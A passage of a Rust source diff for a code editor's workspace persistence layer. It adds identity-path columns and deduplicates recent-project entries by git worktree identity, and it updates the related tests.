SerializedWorkspaceLocation::Local => None, SerializedWorkspaceLocation::Remote(options) => Some(options), }); diff --git a/crates/workspace/src/history_manager.rs b/crates/workspace/src/history_manager.rs index 8e60939a9c25be..09f47d19ab2e69 100644 --- a/crates/workspace/src/history_manager.rs +++ b/crates/workspace/src/history_manager.rs @@ -49,9 +49,12 @@ impl HistoryManager { .unwrap_or_default() .into_iter() .rev() - .filter_map(|(id, location, paths, _timestamp)| { - if matches!(location, SerializedWorkspaceLocation::Local) { - Some(HistoryManagerEntry::new(id, &paths)) + .filter_map(|workspace| { + if matches!(workspace.location, SerializedWorkspaceLocation::Local) { + Some(HistoryManagerEntry::new( + workspace.workspace_id, + &workspace.paths, + )) } else { None } diff --git a/crates/workspace/src/persistence.rs b/crates/workspace/src/persistence.rs index 7248abe9b8dba7..b1328aa3614905 100644 --- a/crates/workspace/src/persistence.rs +++ b/crates/workspace/src/persistence.rs @@ -21,6 +21,7 @@ use db::{ }; use gpui::{Axis, Bounds, Task, WindowBounds, WindowId, point, size}; use project::{ + ProjectGroupKey, bookmark_store::SerializedBookmark, debugger::breakpoint_store::{BreakpointState, SourceBreakpoint}, trusted_worktrees::{DbTrustedPaths, RemoteHostLocation}, @@ -1032,6 +1033,10 @@ impl Domain for WorkspaceDb { ON UPDATE CASCADE ); ), + sql!( + ALTER TABLE workspaces ADD COLUMN identity_paths TEXT; + ALTER TABLE workspaces ADD COLUMN identity_paths_order TEXT; + ), ]; // Allow recovering from bad migration that was initially shipped to nightly @@ -1084,6 +1089,8 @@ impl WorkspaceDb { workspace_id, paths, paths_order, + identity_paths, + identity_paths_order, window_bounds, display, centered_layout, @@ -1093,6 +1100,8 @@ impl WorkspaceDb { WorkspaceId, String, String, + Option, + Option, Option, Option, Option, @@ -1104,6 +1113,8 @@ impl WorkspaceDb { workspace_id, paths, paths_order, + identity_paths, + identity_paths_order, window_state, window_x, window_y, @@ -1141,6 +1152,12 @@ impl WorkspaceDb { paths, order: paths_order, }); + let identity_paths = identity_paths.map(|paths| { + PathList::deserialize(&SerializedPathList { + paths, + order: identity_paths_order.unwrap_or_default(), + }) + }); let remote_connection_options = if let Some(remote_connection_id) = remote_connection_id { self.remote_connection(remote_connection_id) @@ -1157,6 +1174,7 @@ impl WorkspaceDb { None => SerializedWorkspaceLocation::Local, }, paths, + identity_paths, center_group: self .get_center_pane_group(workspace_id) .context("Getting center group") @@ -1181,6 +1199,8 @@ impl WorkspaceDb { let ( paths, paths_order, + identity_paths, + identity_paths_order, window_bounds, display, centered_layout, @@ -1190,6 +1210,8 @@ impl WorkspaceDb { ): ( String, String, + Option, + Option, Option, Option, Option, @@ -1201,6 +1223,8 @@ impl WorkspaceDb { SELECT paths, paths_order, + identity_paths, + identity_paths_order, window_state, window_x, window_y, @@ -1231,6 +1255,12 @@ impl WorkspaceDb { paths, order: paths_order, }); + let identity_paths = identity_paths.map(|paths| { + PathList::deserialize(&SerializedPathList { + paths, + order: identity_paths_order.unwrap_or_default(), + }) + }); let remote_connection_id = remote_connection_id.map(|id| RemoteConnectionId(id as u64)); let remote_connection_options = if let Some(remote_connection_id) = remote_connection_id { @@ -1248,6 +1278,7 @@ impl WorkspaceDb { None => SerializedWorkspaceLocation::Local, }, paths, + identity_paths, center_group: self .get_center_pane_group(workspace_id) .context("Getting center group") @@ -1416,10 +1447,9 @@ impl WorkspaceDb { ret } - /// Saves a workspace using the worktree roots. Will garbage collect any workspaces - /// that used this workspace previously pub(crate) async fn save_workspace(&self, workspace: SerializedWorkspace) { let paths = workspace.paths.serialize(); + let identity_paths = workspace.identity_paths.map(|paths| paths.serialize()); log::debug!("Saving workspace at location: {:?}", workspace.location); self.write(move |conn| { conn.with_savepoint("update_worktrees", || { @@ -1535,6 +1565,8 @@ impl WorkspaceDb { workspace_id, paths, paths_order, + identity_paths, + identity_paths_order, remote_connection_id, left_dock_visible, left_dock_active_panel, @@ -1549,23 +1581,25 @@ impl WorkspaceDb { window_id, timestamp ) - VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11, ?12, ?13, ?14, ?15, CURRENT_TIMESTAMP) + VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11, ?12, ?13, ?14, ?15, ?16, ?17, CURRENT_TIMESTAMP) ON CONFLICT DO UPDATE SET paths = ?2, paths_order = ?3, - remote_connection_id = ?4, - left_dock_visible = ?5, - left_dock_active_panel = ?6, - left_dock_zoom = ?7, - right_dock_visible = ?8, - right_dock_active_panel = ?9, - right_dock_zoom = ?10, - bottom_dock_visible = ?11, - bottom_dock_active_panel = ?12, - bottom_dock_zoom = ?13, - session_id = ?14, - window_id = ?15, + identity_paths = ?4, + identity_paths_order = ?5, + remote_connection_id = ?6, + left_dock_visible = ?7, + left_dock_active_panel = ?8, + left_dock_zoom = ?9, + right_dock_visible = ?10, + right_dock_active_panel = ?11, + right_dock_zoom = ?12, + bottom_dock_visible = ?13, + bottom_dock_active_panel = ?14, + bottom_dock_zoom = ?15, + session_id = ?16, + window_id = ?17, timestamp = CURRENT_TIMESTAMP ); let mut prepared_query = conn.exec_bound(query)?; @@ -1573,6 +1607,8 @@ impl WorkspaceDb { workspace.id, paths.paths.clone(), paths.order.clone(), + identity_paths.as_ref().map(|paths| paths.paths.clone()), + identity_paths.as_ref().map(|paths| paths.order.clone()), remote_connection_id, workspace.docks, workspace.session_id, @@ -1747,6 +1783,7 @@ impl WorkspaceDb { Vec<( WorkspaceId, PathList, + Option, Option, Option, DateTime, @@ -1756,10 +1793,25 @@ impl WorkspaceDb { .recent_workspaces_query()? .into_iter() .map( - |(id, paths, order, remote_connection_id, session_id, timestamp)| { + |( + id, + paths, + order, + identity_paths, + identity_paths_order, + remote_connection_id, + session_id, + timestamp, + )| { ( id, PathList::deserialize(&SerializedPathList { paths, order }), + identity_paths.map(|paths| { + PathList::deserialize(&SerializedPathList { + paths, + order: identity_paths_order.unwrap_or_default(), + }) + }), remote_connection_id.map(RemoteConnectionId), session_id, parse_timestamp(×tamp), @@ -1770,8 +1822,8 @@ impl WorkspaceDb { } query! { - fn recent_workspaces_query() -> Result, Option, String)>> { - SELECT workspace_id, paths, paths_order, remote_connection_id, session_id, timestamp + fn recent_workspaces_query() -> Result, Option, Option, Option, String)>> { + SELECT workspace_id, paths, paths_order, identity_paths, identity_paths_order, remote_connection_id, session_id, timestamp FROM workspaces WHERE paths IS NOT NULL OR @@ -1944,31 +1996,26 @@ impl WorkspaceDb { any_dir } - // Returns the recent project workspaces suitable for showing in the recent-projects UI. - // Scratch workspaces (no paths) are filtered out - they aren't really "projects" and - // are restored separately by `last_session_workspace_locations`. - pub async fn recent_project_workspaces( + // Returns the raw recent workspace history. Scratch workspaces (no paths) are filtered + // out because they are restored separately by `last_session_workspace_locations`. + pub async fn recent_project_workspaces_ungrouped( &self, fs: &dyn Fs, - ) -> Result< - Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - > { + ) -> Result> { let remote_connections = self.remote_connections()?; let mut result = Vec::new(); - for (id, paths, remote_connection_id, _session_id, timestamp) in self.recent_workspaces()? { + for (id, paths, identity_paths_hint, remote_connection_id, _session_id, timestamp) in + self.recent_workspaces()? + { if let Some(remote_connection_id) = remote_connection_id { if let Some(connection_options) = remote_connections.get(&remote_connection_id) { - result.push(( - id, - SerializedWorkspaceLocation::Remote(connection_options.clone()), - paths, + result.push(RecentWorkspace { + workspace_id: id, + location: SerializedWorkspaceLocation::Remote(connection_options.clone()), + paths: paths.clone(), + identity_paths: identity_paths_hint.unwrap_or(paths), timestamp, - )); + }); } continue; } @@ -1978,12 +2025,76 @@ impl WorkspaceDb { } if Self::all_paths_exist_with_a_directory(paths.paths(), fs).await { - result.push((id, SerializedWorkspaceLocation::Local, paths, timestamp)); + let identity_paths = resolve_local_workspace_identity(fs, &paths) + .await + .or(identity_paths_hint) + .unwrap_or_else(|| paths.clone()); + result.push(RecentWorkspace { + workspace_id: id, + location: SerializedWorkspaceLocation::Local, + paths, + identity_paths, + timestamp, + }); } } + Ok(result) } + // Returns the recent project workspaces suitable for recent-project UIs. + // Entries are deduplicated by git worktree identity, but preserve the original + // serialized paths for reopening. + pub async fn recent_project_workspaces(&self, fs: &dyn Fs) -> Result> { + Ok(dedupe_recent_workspaces( + self.recent_project_workspaces_ungrouped(fs).await?, + )) + } + + pub async fn delete_recent_workspace_group( + &self, + target: &RecentWorkspace, + ) -> Result> { + let target_paths = &target.identity_paths; + let target_remote_connection = match &target.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(connection) => { + Some(remote_connection_identity(connection)) + } + }; + + let remote_connections = self.remote_connections()?; + + let mut workspace_ids = Vec::new(); + for (workspace_id, paths, identity_paths, remote_connection_id, _, _) in + self.recent_workspaces()? + { + let remote_connection = if let Some(id) = remote_connection_id { + let Some(connection_options) = remote_connections.get(&id) else { + continue; + }; + Some(remote_connection_identity(connection_options)) + } else { + None + }; + if remote_connection == target_remote_connection + && &identity_paths.unwrap_or(paths) == target_paths + { + workspace_ids.push(workspace_id); + } + } + + futures::future::join_all( + workspace_ids + .iter() + .copied() + .map(|workspace_id| self.delete_workspace_by_id(workspace_id)), + ) + .await; + + Ok(workspace_ids) + } + // Deletes workspace rows that can no longer be restored from. Remote workspaces whose // connection was removed, and (on Windows) workspaces pointing at WSL paths, are cleaned // up immediately. Local workspaces with no valid paths on disk are kept for seven days @@ -1998,7 +2109,9 @@ impl WorkspaceDb { let remote_connections = self.remote_connections()?; let now = Utc::now(); let mut workspaces_to_delete = Vec::new(); - for (id, paths, remote_connection_id, session_id, timestamp) in self.recent_workspaces()? { + for (id, paths, _identity_paths_hint, remote_connection_id, session_id, timestamp) in + self.recent_workspaces()? + { if let Some(session_id) = session_id.as_deref() { if session_id == current_session_id || Some(session_id) == last_session_id { continue; @@ -2038,17 +2151,7 @@ impl WorkspaceDb { Ok(()) } - pub async fn last_workspace( - &self, - fs: &dyn Fs, - ) -> Result< - Option<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - > { + pub async fn last_workspace(&self, fs: &dyn Fs) -> Result> { Ok(self.recent_project_workspaces(fs).await?.into_iter().next()) } @@ -2536,80 +2639,73 @@ VALUES {placeholders};"# } } -type WorkspaceEntry = ( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, -); - -/// Resolves workspace entries whose paths are git linked worktree checkouts -/// to their main repository paths. -/// -/// For each workspace entry: -/// - If any path is a linked worktree checkout, all worktree paths in that -/// entry are resolved to their main repository paths, producing a new -/// `PathList`. -/// - The resolved entry is then deduplicated against existing entries: if a -/// workspace with the same paths already exists, the entry with the most -/// recent timestamp is kept. -pub async fn resolve_worktree_workspaces( - workspaces: impl IntoIterator, - fs: &dyn Fs, -) -> Vec { - // First pass: resolve worktree paths to main repo paths concurrently. - let resolved = futures::future::join_all(workspaces.into_iter().map(|entry| async move { - let paths = entry.2.paths(); - if paths.is_empty() { - return entry; - } - - // Resolve each path concurrently - let resolved_paths = futures::future::join_all( - paths - .iter() - .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)), - ) - .await; +#[derive(Clone, Debug, PartialEq)] +pub struct RecentWorkspace { + pub workspace_id: WorkspaceId, + pub location: SerializedWorkspaceLocation, + pub paths: PathList, + pub identity_paths: PathList, + pub timestamp: DateTime, +} - // If no paths were resolved, this entry is not a worktree — keep as-is - if resolved_paths.iter().all(|r| r.is_none()) { - return entry; - } +impl RecentWorkspace { + pub fn project_group_key(&self) -> ProjectGroupKey { + let host = match &self.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(options) => Some(options.clone()), + }; + ProjectGroupKey::new(host, self.identity_paths.clone()) + } +} - // Build new path list, substituting resolved paths - let new_paths: Vec = paths +async fn resolve_local_workspace_identity(fs: &dyn Fs, paths: &PathList) -> Option { + let raw_paths = paths.paths(); + let resolved_paths = futures::future::join_all( + raw_paths .iter() - .zip(resolved_paths.iter()) - .map(|(original, resolved)| { - resolved - .as_ref() - .cloned() - .unwrap_or_else(|| original.clone()) - }) - .collect(); - - let new_path_refs: Vec<&Path> = new_paths.iter().map(|p| p.as_path()).collect(); - (entry.0, entry.1, PathList::new(&new_path_refs), entry.3) - })) + .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)), + ) .await; - // Second pass: deduplicate by PathList. - // When two entries resolve to the same paths, keep the one with the - // more recent timestamp. - let mut seen: collections::HashMap, usize> = collections::HashMap::default(); - let mut result: Vec = Vec::new(); - - for entry in resolved { - let key: Vec = entry.2.paths().to_vec(); - if let Some(&existing_idx) = seen.get(&key) { - // Keep the entry with the more recent timestamp - if entry.3 > result[existing_idx].3 { - result[existing_idx] = entry; + if resolved_paths.iter().all(|resolved| resolved.is_none()) { + return None; + } + + let resolved_paths: Vec = raw_paths + .iter() + .zip(resolved_paths.iter()) + .map(|(original, resolved)| { + resolved + .as_ref() + .cloned() + .unwrap_or_else(|| original.clone()) + }) + .collect(); + let resolved_path_refs: Vec<&Path> = resolved_paths.iter().map(PathBuf::as_path).collect(); + Some(PathList::new(&resolved_path_refs)) +} + +fn dedupe_recent_workspaces( + workspaces: impl IntoIterator, +) -> Vec { + let mut indices_by_key: HashMap<(Option, Vec), usize> = + HashMap::default(); + let mut result: Vec = Vec::new(); + for workspace in workspaces { + let location_identity = match &workspace.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(connection) => { + Some(remote_connection_identity(connection)) + } + }; + let key = (location_identity, workspace.identity_paths.paths().to_vec()); + if let Some(&existing_index) = indices_by_key.get(&key) { + if workspace.timestamp > result[existing_index].timestamp { + result[existing_index] = workspace; } } else { - seen.insert(key, result.len()); - result.push(entry); + indices_by_key.insert(key, result.len()); + result.push(workspace); } } @@ -2796,6 +2892,7 @@ mod tests { let workspace = SerializedWorkspace { id, paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -2952,6 +3049,7 @@ mod tests { let workspace = SerializedWorkspace { id, paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3001,6 +3099,7 @@ mod tests { let workspace_without_breakpoint = SerializedWorkspace { id, paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3100,6 +3199,7 @@ mod tests { let mut workspace_1 = SerializedWorkspace { id: WorkspaceId(1), paths: PathList::new(&["/tmp", "/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3116,6 +3216,7 @@ mod tests { let workspace_2 = SerializedWorkspace { id: WorkspaceId(2), paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3224,6 +3325,7 @@ mod tests { let workspace = SerializedWorkspace { id: WorkspaceId(5), paths: PathList::new(&["/tmp", "/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group, window_bounds: Default::default(), @@ -3259,6 +3361,7 @@ mod tests { let workspace_1 = SerializedWorkspace { id: WorkspaceId(1), paths: PathList::new(&["/tmp", "/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3275,6 +3378,7 @@ mod tests { let mut workspace_2 = SerializedWorkspace { id: WorkspaceId(2), paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3318,6 +3422,7 @@ mod tests { let mut workspace_3 = SerializedWorkspace { id: WorkspaceId(3), paths: PathList::new(&["/tmp2", "/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3357,6 +3462,7 @@ mod tests { let workspace_1 = SerializedWorkspace { id: WorkspaceId(1), paths: PathList::new(&["/tmp1"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3373,6 +3479,7 @@ mod tests { let workspace_2 = SerializedWorkspace { id: WorkspaceId(2), paths: PathList::new(&["/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3389,6 +3496,7 @@ mod tests { let workspace_3 = SerializedWorkspace { id: WorkspaceId(3), paths: PathList::new(&["/tmp3"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3405,6 +3513,7 @@ mod tests { let workspace_4 = SerializedWorkspace { id: WorkspaceId(4), paths: PathList::new(&["/tmp4"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3430,6 +3539,7 @@ mod tests { let workspace_5 = SerializedWorkspace { id: WorkspaceId(5), paths: PathList::default(), + identity_paths: None, location: SerializedWorkspaceLocation::Remote( db.remote_connection(connection_id).unwrap(), ), @@ -3448,6 +3558,7 @@ mod tests { let workspace_6 = SerializedWorkspace { id: WorkspaceId(6), paths: PathList::new(&["/tmp6c", "/tmp6b", "/tmp6a"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3506,6 +3617,7 @@ mod tests { SerializedWorkspace { id: WorkspaceId(4), paths: PathList::new(paths), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: center_group.clone(), window_bounds: Default::default(), @@ -3548,6 +3660,7 @@ mod tests { .map(|(id, paths, window_id)| SerializedWorkspace { id: WorkspaceId(id), paths: PathList::new(paths.as_slice()), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3646,6 +3759,7 @@ mod tests { SerializedWorkspace { id: WorkspaceId(id as i64), paths: PathList::new(paths), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group, window_bounds: Default::default(), @@ -3660,6 +3774,48 @@ mod tests { } } + fn remote_workspace_with(id: u64, host: &str, paths: &[&Path]) -> SerializedWorkspace { + SerializedWorkspace { + id: WorkspaceId(id as i64), + paths: PathList::new(paths), + identity_paths: None, + location: SerializedWorkspaceLocation::Remote(RemoteConnectionOptions::Ssh( + SshConnectionOptions { + host: host.into(), + ..Default::default() + }, + )), + center_group: empty_pane_group(), + window_bounds: Default::default(), + display: Default::default(), + docks: Default::default(), + bookmarks: Default::default(), + breakpoints: Default::default(), + centered_layout: false, + session_id: None, + window_id: Some(id), + user_toolchains: Default::default(), + } + } + + async fn local_recent_workspace( + workspace_id: WorkspaceId, + paths: PathList, + timestamp: DateTime, + fs: &dyn Fs, + ) -> RecentWorkspace { + let identity_paths = resolve_local_workspace_identity(fs, &paths) + .await + .unwrap_or_else(|| paths.clone()); + RecentWorkspace { + workspace_id, + location: SerializedWorkspaceLocation::Local, + paths, + identity_paths, + timestamp, + } + } + #[gpui::test] async fn test_scratch_only_workspace_restores_from_last_session(cx: &mut gpui::TestAppContext) { let fs = fs::FakeFs::new(cx.executor()); @@ -3680,7 +3836,9 @@ mod tests { let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); assert!( - recents.iter().all(|(id, ..)| *id != WorkspaceId(1)), + recents + .iter() + .all(|workspace| workspace.workspace_id != WorkspaceId(1)), "scratch-only workspace must not appear in the recent-projects UI" ); } @@ -3883,6 +4041,7 @@ mod tests { .map(|(id, remote_connection, window_id)| SerializedWorkspace { id: WorkspaceId(id), paths: PathList::default(), + identity_paths: None, location: SerializedWorkspaceLocation::Remote(remote_connection), center_group: Default::default(), window_bounds: Default::default(), @@ -4245,6 +4404,7 @@ mod tests { let workspace = SerializedWorkspace { id, paths: PathList::new(empty_paths), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: None, @@ -4322,6 +4482,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: WorkspaceId(*id), paths: PathList::new(&[*dir]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4608,6 +4769,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: workspace2_db_id, paths: PathList::new(&[&dir]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4704,6 +4866,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: ws1_id, paths: PathList::new(&[dir1.path()]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4721,6 +4884,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: ws2_id, paths: PathList::new(&[dir2.path()]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4800,6 +4964,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: workspace2_db_id, paths: PathList::new(&[&dir]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4957,7 +5122,7 @@ mod tests { } #[gpui::test] - async fn test_resolve_worktree_workspaces(cx: &mut gpui::TestAppContext) { + async fn test_recent_workspace_identity_deduplication(cx: &mut gpui::TestAppContext) { let fs = fs::FakeFs::new(cx.executor()); // Main repo with a linked worktree entry @@ -5012,64 +5177,59 @@ mod tests { let t3 = Utc::now() - chrono::Duration::hours(1); let workspaces = vec![ - // 1: Main checkout of /repo (opened earlier) - ( - WorkspaceId(1), - SerializedWorkspaceLocation::Local, - PathList::new(&["/repo"]), - t0, - ), - // 2: Linked worktree of /repo (opened more recently) - // Should dedup with #1; more recent timestamp wins. - ( + local_recent_workspace(WorkspaceId(1), PathList::new(&["/repo"]), t0, fs.as_ref()) + .await, + local_recent_workspace( WorkspaceId(2), - SerializedWorkspaceLocation::Local, PathList::new(&["/worktree"]), t1, - ), - // 3: Mixed-path workspace: one root is a linked worktree, - // the other is a normal repo. The worktree path should be - // resolved; the normal path kept as-is. - ( + fs.as_ref(), + ) + .await, + local_recent_workspace( WorkspaceId(3), - SerializedWorkspaceLocation::Local, PathList::new(&["/other-repo", "/worktree"]), t2, - ), - // 4: Non-git project — passed through unchanged. - ( + fs.as_ref(), + ) + .await, + local_recent_workspace( WorkspaceId(4), - SerializedWorkspaceLocation::Local, PathList::new(&["/plain-project"]), t3, - ), + fs.as_ref(), + ) + .await, ]; - let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + let result = dedupe_recent_workspaces(workspaces); // Should have 3 entries: #1 and #2 deduped into one, plus #3 and #4. assert_eq!(result.len(), 3); // First entry: /repo — deduplicated from #1 and #2. // Keeps the position of #1 (first seen), but with #2's later timestamp. - assert_eq!(result[0].2.paths(), &[PathBuf::from("/repo")]); - assert_eq!(result[0].3, t1); + assert_eq!(result[0].identity_paths.paths(), &[PathBuf::from("/repo")]); + assert_eq!(result[0].timestamp, t1); // Second entry: mixed-path workspace with worktree resolved. // /worktree → /repo, so paths become [/other-repo, /repo] (sorted). assert_eq!( - result[1].2.paths(), + result[1].identity_paths.paths(), &[PathBuf::from("/other-repo"), PathBuf::from("/repo")] ); - assert_eq!(result[1].0, WorkspaceId(3)); + assert_eq!(result[1].workspace_id, WorkspaceId(3)); // Third entry: non-git project, unchanged. - assert_eq!(result[2].2.paths(), &[PathBuf::from("/plain-project")]); - assert_eq!(result[2].0, WorkspaceId(4)); + assert_eq!( + result[2].identity_paths.paths(), + &[PathBuf::from("/plain-project")] + ); + assert_eq!(result[2].workspace_id, WorkspaceId(4)); } #[gpui::test] - async fn test_resolve_worktree_workspaces_bare_repo(cx: &mut gpui::TestAppContext) { + async fn test_recent_workspace_identity_for_bare_repo(cx: &mut gpui::TestAppContext) { let fs = fs::FakeFs::new(cx.executor()); // Bare repo at /foo/.bare (commondir doesn't end with .git) @@ -5098,19 +5258,315 @@ mod tests { let t0 = Utc::now(); - let workspaces = vec![( + let result = local_recent_workspace( WorkspaceId(1), - SerializedWorkspaceLocation::Local, PathList::new(&["/foo/my-feature"]), t0, - )]; + fs.as_ref(), + ) + .await; + + // Bare-backed worktrees should resolve to the repo identity path, which + // is the parent directory users think of as the project root. + assert_eq!(result.identity_paths.paths(), &[PathBuf::from("/foo")]); + } + + #[gpui::test] + async fn test_recent_workspace_identity_deduplicates_main_and_linked_worktree( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + + fs.insert_tree( + "/the-project", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + fs.insert_tree( + "/the-project/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; - let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + let t0 = Utc::now() - chrono::Duration::hours(1); + let t1 = Utc::now(); + let workspaces = vec![ + local_recent_workspace( + WorkspaceId(1), + PathList::new(&["/the-project"]), + t0, + fs.as_ref(), + ) + .await, + local_recent_workspace( + WorkspaceId(2), + PathList::new(&["/the-project/feature-a"]), + t1, + fs.as_ref(), + ) + .await, + ]; + + let result = dedupe_recent_workspaces(workspaces); - // The worktree path must be preserved unchanged — /foo/.bare is a bare repo - // and cannot serve as a working-tree root, so resolution must return None. assert_eq!(result.len(), 1); - assert_eq!(result[0].2.paths(), &[PathBuf::from("/foo/my-feature")]); + assert_eq!( + result[0].identity_paths.paths(), + &[PathBuf::from("/the-project")] + ); + assert_eq!(result[0].workspace_id, WorkspaceId(2)); + assert_eq!(result[0].timestamp, t1); + } + + #[gpui::test] + async fn test_recent_project_workspaces_preserve_reopen_paths(cx: &mut gpui::TestAppContext) { + let fs = fs::FakeFs::new(cx.executor()); + let db = + WorkspaceDb::open_test_db("test_recent_project_workspaces_preserve_reopen_paths").await; + + fs.insert_tree( + "/the-project", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + fs.insert_tree( + "/the-project/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; + + db.save_workspace(workspace_with( + 1, + &[Path::new("/the-project")], + empty_pane_group(), + None, + )) + .await; + db.save_workspace(workspace_with( + 2, + &[Path::new("/the-project/feature-a")], + empty_pane_group(), + None, + )) + .await; + db.set_timestamp_for_tests(WorkspaceId(1), "2024-01-01 00:00:00".to_owned()) + .await + .unwrap(); + db.set_timestamp_for_tests(WorkspaceId(2), "2024-01-01 00:00:01".to_owned()) + .await + .unwrap(); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 1); + assert_eq!(recents[0].workspace_id, WorkspaceId(2)); + assert_eq!( + recents[0].paths.paths(), + &[PathBuf::from("/the-project/feature-a")] + ); + assert_eq!( + recents[0].identity_paths.paths(), + &[PathBuf::from("/the-project")] + ); + } + + #[gpui::test] + async fn test_recent_project_workspaces_remote_identity_hint(cx: &mut gpui::TestAppContext) { + let fs = fs::FakeFs::new(cx.executor()); + let db = + WorkspaceDb::open_test_db("test_recent_project_workspaces_remote_identity_hint").await; + + let workspace = remote_workspace_with(1, "example.com", &[Path::new("/repo/feature-a")]); + db.save_workspace(SerializedWorkspace { + identity_paths: Some(PathList::new(&["/repo"])), + ..workspace + }) + .await; + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 1); + assert_eq!( + recents[0].paths.paths(), + &[PathBuf::from("/repo/feature-a")] + ); + assert_eq!(recents[0].identity_paths.paths(), &[PathBuf::from("/repo")]); + } + + #[gpui::test] + async fn test_recent_project_workspaces_remote_paths_do_not_use_local_fs_identity( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + let db = WorkspaceDb::open_test_db( + "test_recent_project_workspaces_remote_paths_do_not_use_local_fs_identity", + ) + .await; + + fs.insert_tree( + "/repo", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + fs.insert_tree( + "/repo/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; + + db.save_workspace(remote_workspace_with( + 1, + "example.com", + &[Path::new("/repo/feature-a")], + )) + .await; + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 1); + assert_eq!( + recents[0].identity_paths.paths(), + &[PathBuf::from("/repo/feature-a")] + ); + } + + #[gpui::test] + async fn test_recent_project_workspaces_do_not_dedupe_remote_hosts( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + let db = + WorkspaceDb::open_test_db("test_recent_project_workspaces_do_not_dedupe_remote_hosts") + .await; + + db.save_workspace(remote_workspace_with(1, "host-a", &[Path::new("/repo")])) + .await; + db.save_workspace(remote_workspace_with(2, "host-b", &[Path::new("/repo")])) + .await; + db.set_timestamp_for_tests(WorkspaceId(1), "2024-01-01 00:00:00".to_owned()) + .await + .unwrap(); + db.set_timestamp_for_tests(WorkspaceId(2), "2024-01-01 00:00:01".to_owned()) + .await + .unwrap(); + + let recents 